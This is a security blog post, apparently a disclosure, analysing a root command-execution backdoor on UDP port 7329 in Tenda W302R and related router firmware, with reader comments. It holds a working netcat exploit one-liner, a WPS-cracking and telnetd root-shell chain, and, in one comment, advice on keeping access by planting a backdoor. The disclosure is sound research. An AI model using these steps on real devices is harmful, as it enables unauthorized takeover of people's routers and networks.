From China, With Love

Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.

After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:

Server header string in /bin/httpd

Server header string in /bin/httpd

But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:

pthread_create(&var_10, 0, MfgThread, 0);

pthread_create(&var_10, 0, MfgThread, 0);

Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…

The first thing MfgThread does is create a UDP socket and bind it to port 7329:

Create UDP socket and bind to port 7329

Create UDP socket and bind to port 7329

The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:

Read packet from socket and check packet size

Read packet from socket and check packet size

Now for the fun part; the received UDP packet is then parsed by this block of code:

Processing the received packet

Processing the received packet

In C, this code reads:

memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

memcpy(rx_magic_string, rx_buf, 9);
command_byte[0] = rx_buf[11];
memcpy(command_arg, rx_buf+12, rx_size-12);

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

We can see that the thread is expecting a packet with the following structure:

struct command_packet_t
    char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
    char command_byte;
    char command_arg[117];

As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (‘1’, ‘x’, and ‘e’):

Comparing command_byte to '1', 'x' and 'e'

Comparing command_byte to ‘1’, ‘x’ and ‘e’

For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:

    case 'e':
        strcpy(tx_buf, "w302r_mfg");
        tx_size = 9;
    case '1':
        if(strstr(command_arg, "iwpriv") != NULL)
            tx_size = call_shell(command_arg, tx_buf, 0x800);
            strcpy(tx_buf, "000000");
            tx_size = strlen(tx_buf);
    case 'x':
        tx_size = call_shell(command_arg, tx_buf, 0x800);
        goto outer_receive_loop;

sendto(client_socket, tx_buf, tx_size, client_sock_addr, 16);
goto outer_receive_loop;

The following actions correspond to the three accepted command bytes:

  • ‘e’ – Responds with a pre-defined string, basically a ping test
  • ‘1’ – Intended to allow you to run iwpriv commands
  • ‘x’ – Allows you to run any command, as root

If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen:

popen(command_arg, "r");

popen(command_arg, “r”);

What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!

Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:

$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 7329
drwxr-xr-x    2 0        0            1363 webroot
drwxr-xr-x    1 0        0               0 var
drwxr-xr-x    5 0        0              43 usr
drwxr-xr-x    1 0        0               0 tmp
drwxr-xr-x    2 0        0               3 sys
drwxr-xr-x    2 0        0             569 sbin
dr-xr-xr-x   39 0        0               0 proc
drwxr-xr-x    2 0        0               3 mnt
drwxr-xr-x    1 0        0               0 media
drwxr-xr-x    4 0        0             821 lib
lrwxrwxrwx    1 0        0              11 init -> bin/busybox
drwxr-xr-x    2 0        0               3 home
drwxr-xr-x    7 0        0             154 etc_ro
drwxr-xr-x    1 0        0               0 etc
drwxr-xr-x    1 0        0               0 dev
drwxr-xr-x    2 1000     100           574 bin

One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):

ReaverPro cracking the WPS pin

ReaverPro cracking the WPS pin

Starting telnetd and getting a root shell

Starting telnetd and getting a root shell

As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.


ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected:

Bookmark the permalink.

96 Responses to From China, With Love

  1. virusdefender says:

    it’s mysterious…

  2. monky says:

    Chinese device has backdoor in router. wow… amazing!!!!

  3. Pingback: Tenda路由器后门? | USA is China

  4. cong ty luat says:

    from china with love. :V

    • craig is a born again as$h0le says:

      from usa, with hate/slander/politically motivated highly biased bullshit articles. first of all, you still need to crack the wps pwd, so how the fuck is this a backdoor. second, this is the second time u’ve only targeted any hardware that is even remotely related to china. the first was d-link (actually taiwan based). there are hundres of routers out there with exploits, nice to know you only narrow your selection based on some seedy agenda.

  5. Preston says:

    Some how, the source of this GoAhead was on github:

    Github record shows the repo was commited to github a year ago. It shows very clear how the backdoor “MfgThread” works.

    I’ve no idea where the source comes from, maybe leaked from a engineer? I guess Tenda doesn’t intent to opensource their firmware.

    • Craig says:

      Yeah, I saw that too (after I RE’d the firmware of course :P). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to github though.

  6. Jobs says:

    I’m using f*** tenda wireless accesspoint…

    • Craig says:

      Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.

    • Chinese Guy says:

      Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.

      • Craig says:

        I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.

  7. ea says:

    Nice find, I grepped trough the different firmwares on tenda website :

  8. Veronique says:

    F** China device !

  9. Pingback: Kolejna tylna furtka w ruterach – wystarczy magiczny pakiet UDP | Zaufana Trzecia Strona

  10. Benny says:

    Great work, congratulations to your success! :)

  11. Pingback: NeoAtlantis/NERV | 【转载】腾达路由器后门导致root权限访问

  12. Jack says:

    Well, We should boycott chinese devices immediately!

  13. shadowlips says:

    I think the none-open-source device more dangerous in now time, like HuaWei router and switch, ZTE devices, We can’t imagine it……

  14. Pingback: .:[ d4 n3wS ]:. » Tenda : une backdoor dans les routeurs chinois

  15. Ahmed says:

    I’m just curious, what software are you using to do all amazing reversing engineering stuff?

  16. says:

    Hello, ~~~~~Seeking testing

  17. Ahmed says:

    This doesn’t work on MWN-WAPR150N router. I’ve just tested it.

    • Craig says:

      Is it an MWN-WAPR150N or an MWN-WAPR150Nv2? The firmware for the MWN-WAPR150Nv2 is radically different and does not contain this backdoor. I have confirmed that the latest firmware for the MWN-WAPR150N (v11.8 at the time of this writing) does in fact have this same backdoor.

      • Ahmed says:

        I’ve tested your exploit on MWN-WAPR150Nv2 firmware. So, you are correct.

        You did an amazing job reverse engineering their firmware. If you want to do another project, check out Westell VersaLink 327W Verizon router. They released a firmware that opens a TCP port directly on the router, and cannot be closed.

        You can read about it here:

      • Ellie says:

        I’m wondering if this is the case for the MWN-WAPR300N? My phone’s been redirecting to fishy websites only when I’m on my home wifi. Several devices are connected and only my phone is affected so who knows. I just upgraded the firmware to the latest version, just wondering how I, a computer novice, can test whether I’m vulnerable?

  18. HD Moore says:

    The GitHub sourced linked by Preston uses a different magic string. This may be even more common, with different magics for each vendor:

    if (strcmp(FlagBuf,”rlink_mfg”) != 0) {

    • Craig says:

      Interesting; I know that at least the W330R uses a Ralink chipset. It wouldn’t surprise me if this is code supplied by Ralink to vendors and Tenda just changed the magic string to their device’s model number.

  19. Pingback: Backdoor Found In D-Link Consumer Routers

  20. Pingback: В беспроводных маршрутизаторах Tenda и Medialink обнаружен бэкдор, активируемый UDP-пакетом | — Всероссийский портал о UNIX-системах

  21. Pingback: From China, With Love | Rocketboom

  22. Eric Wang says:

    In china, I think TP-link is much better than D-link and Tenda,
    Tenda is just rubbish, it’s not easy to use,
    TP-link is much easier to use, but I am not sure does it have backdoor.

  23. muc in says:

    I’m using TPLINK wireless accesspoint

  24. Pingback: Backdoor en routers chinos Tenda

  25. Pingback: Tenda路由器后门,From China,With Love! | Betula’s Blog

  26. NoArmsNoLegsInOcean says:

    I keep my key under the mat in the backyard.

  27. Criação says:

    Hi Craig… really nice work indeed. I envy your skills…
    One question: Are you able to use that 64 characters long wpa psk key you got with Reaver? This is something that I was unable to solve in most cases.

    • Craig says:

      I don’t know if all affected devices do this, but the one I tested did give back a random 64 character key instead of the actual WPA key currently in use. The new Reaver has an option to disable wireless encryption once you know the WPS pin, which is what I used to get into the wireless network. It isn’t ideal, but most people would just think it was the router being buggy anyway, and even if they put another WPA key in place, uploading a backdoor to the router would let you keep access to the network.

  28. iddlebit says:

    Now might be a good time to mention OpenWRT

  29. Sally Zhang says:

    Has this router exists the backdoor ?
    No prodcut seems to be safe now!

  30. Pingback: How to prevent a UDP-based channel from turning into a "backdoor"?CopyQuery CopyQuery | Question & Answer Tool for your Technical Queries,CopyQuery, ejjuit, query, copyquery,, android doubt, ios question, sql query, sqlite quer

  31. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers

  32. Pingback: 走近科学:在中国,有爱——腾达Tenda 路由器后门分析 | Panni_007 Security

  33. Pingback: Backdoor Found In Tenda Router Firmware | Mocana DeviceLine Blog

  34. ALIEN360 says:

    Hello, respect for the article. I can confirm that this backdoor doesn’t work on W316R, I had tried with 3 firmware versions, and with using both w302r_mfg and w316r_mfg, maybe there are different strings for all models.

  35. Pingback: D-Link hole-prober finds 'backdoor' in Chinese wireless routers | Techbait Tech News

  36. Pingback: ste williams – D-Link hole-prober finds ‘backdoor’ in Chinese wireless routers

  37. Pingback: Tenda keeps D-Link Company | The Security Shelf

  38. Pingback: From China with love | Tibetan I Tech

  39. says:




    • Hang says:

      It is interesting that the low price of Chinese products is an excuse of the backdoor. The backdoor is an ethical issue rather than a cost issue. Does the last paragraph a threat? Do you think it works?

      This is really a unique way of reasoning of Chinese Communists.



      • says:

        如果你使用山寨手机想要有苹果手机的效果是不可能的。其实我想说腾达的是因为低价格产品而没有去好好研究固件,这无可厚非是腾达的错,但我理解为:便宜货当玩具- -!我觉得你们的思想差别很大。比如:腾达这个不安全,你要腾达换产品!而我是能用就能,实在不安全就自己另外买一个。




  40. Pingback: Rotten routers? More brands found to contain hidden “backdoors” – Information security alerts and news

  41. Pingback: Router-Schwachstellen: Jetzt auch bei Netgear und Tenda - Nerd-Supreme

  42. Pingback: IT Secure Site » Blog Archive » Rotten routers? More brands found to contain hidden “backdoors”

  43. Pingback: Tenda Wireless Routers Feature Backdoor | HOTforSecurity

  44. Pingback: 中國騰達路由器藏有後門漏洞 | 網絡安全與隱私

  45. Pingback: 轉貼:中國騰達路由器藏有後門漏洞

  46. zucchini says:

    I have been having trouble unsquashing this filesystem…
    “SYNTAX: /usr/local/bin/unsquashfs [options] filesystem
    Decompressors available:

  47. Pingback: One Ping Only | TechSNAP 133 | Jupiter Broadcasting

  48. DS says:

    Worked on my Zonet/Tenda router(s). Only thing I found is that the telnetd actually asks for a username/password which I can’t find.

  49. Matrong says:

    Actually, Tenda just fix it by uploading the new patches. Gota say, I kind of like Tenda, I been using Tenda since 2009, got some issues on setup but great price and reliable, my w307r still works like a cham. I believe there are lots of folks like me just do not care the brand that much, but I aint letting someone just talk trash about the brand I like just like that.

    Here is the link of their explaination:

  50. Pingback: Tenda路由器后门,From China,With Love! | sky'自留地

  51. Pingback: Security News #0×56 | CyberOperations

  52. Pingback: Tenda无线路由器远程命令执行后门漏洞 | 产品经理公社

  53. Pingback: 中國騰達路由器藏有後門漏洞 | 網絡安全與隱私

  54. Pingback: ste williams – Tenda seals shut router backdoor found by D-Link hole-prober

  55. Pingback: Tenda seals shut router backdoor found by D-Link hole-prober | Techbait Tech News

  56. Pingback: Liquidmatrix Security Digest Podcast - Episode 34 - Liquidmatrix Security Digest Liquidmatrix Security Digest

  57. Pingback: 腾达Tenda 路由器后门分析

  58. Pingback: PrimalSec Podcast Episode #3 ← Primal Security Podcast

  59. Pingback: 我是如何在腾达路由器固件程序上发现漏洞的 | 天天三国杀

  60. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers | Cyber Defense Magazine

  61. Pingback: Backdoor found in Chinese Tenda Wireless Routers, allows Root access to Hackers | My great WordPress blog

  62. Pingback: Intrusio Router backdoor reloaded…

  63. Pingback: Tenda и тяхната задна врата в W302R | Computer Support

  64. tel says:

    Given that this is not a WAN-side hole, this seems to me like good old human error being attributed (by some) to malice.

    Nice RE and write-up, I just have 2 suggestions:

    1) Mention that Tenda’s have subsequently apologised and issued fixed firmware:

    2) and perhaps you’d be kind enough to verify that their fix (a) fixes this hole, and (b) doesn’t introduce any others.

  65. Pingback: Tenda路由器后门,From China,With Love! | 写代码度日的骚年

Leave a Reply

Your email address will not be published. Required fields are marked *